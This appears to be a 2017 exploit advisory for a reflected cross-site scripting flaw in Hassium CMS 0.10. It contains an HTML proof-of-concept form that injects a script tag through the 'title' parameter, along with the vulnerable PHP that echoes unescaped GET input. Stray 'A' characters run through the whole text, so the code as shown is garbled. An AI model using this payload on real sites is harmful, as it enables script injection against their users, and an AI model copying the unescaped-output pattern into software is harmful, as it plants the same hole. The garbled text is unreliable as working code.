*=============================================================|
|A ExploitA Title:A A HassiumA CMSA CrossA SiteA Scripting
|
|A ExploitA Author:A AshiyaneA DigitalA SecurityA Team
|
|A VendorA Homepage:A http://www.hassium.org/index.php
|
|A DownloadA LinkA :A https://github.com/hassiumsoft/hasscms-app/archive/master.zip
|
|A VersionA :A VA 0.10
|
|A PlatformA :A PHP
|
|A TestedA on:A A KaliA LinuxA 
|
|A Date:A 1A /14A /A 2017
*=============================================================|
|A ExploitA Code:A 
|A 
|<HTML>
|<HEAD>
|A A A A <TITLE>HassiumA CMSA CrossA SiteA Scripting</TITLE>
|</HEAD>
|<BODY>
|<formA action="http://Localhost/hasscms-app-master/themes/candidate/media/jackbox/modules/jackbox_social.php"A method="get">
|A <inputA type="hidden"A name="title"A value=""/><script>alert('M.R.S.L.Y')</script>">
|</form>
|</BODY>
|</HTML>
|
*=======================|
|A vulnerabilityA MethodA :A GET
*=======================|
|VulnerableA code:
|
|A A A <?php
|A A A A A A A A 
|A A A A A A A A ifA (isset($_GET["title"]))A {
|A A A A A A A A A A A A 
|A A A A A A A A A A A A $titleA =A $_GET["title"];
|A A A A A A A A A A A A printA str_replace("{contentTitle}",A $title,A '<metaA itemprop="name"A content="{contentTitle}"A />');
|A A A A A A A A }
|A A A A A A A A 
|A A A A A A A A ifA (isset($_GET["poster"]))A {
|A A A A A A A A A A A A 
|A A A A A A A A A A A A $posterA =A $_GET["poster"];
|A A A A A A A A A A A A printA str_replace("{imgPoster}",A $poster,A '<metaA itemprop="image"A content="{imgPoster}"A />');
|A A A A A A A A }
|A A A A A A A A 
|A A A A A A A A ?>
*=============================================================|
|A SpecialA ThanksA ToA :A VirangarA ,A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O
|A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O
|A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A 
*=============================================================|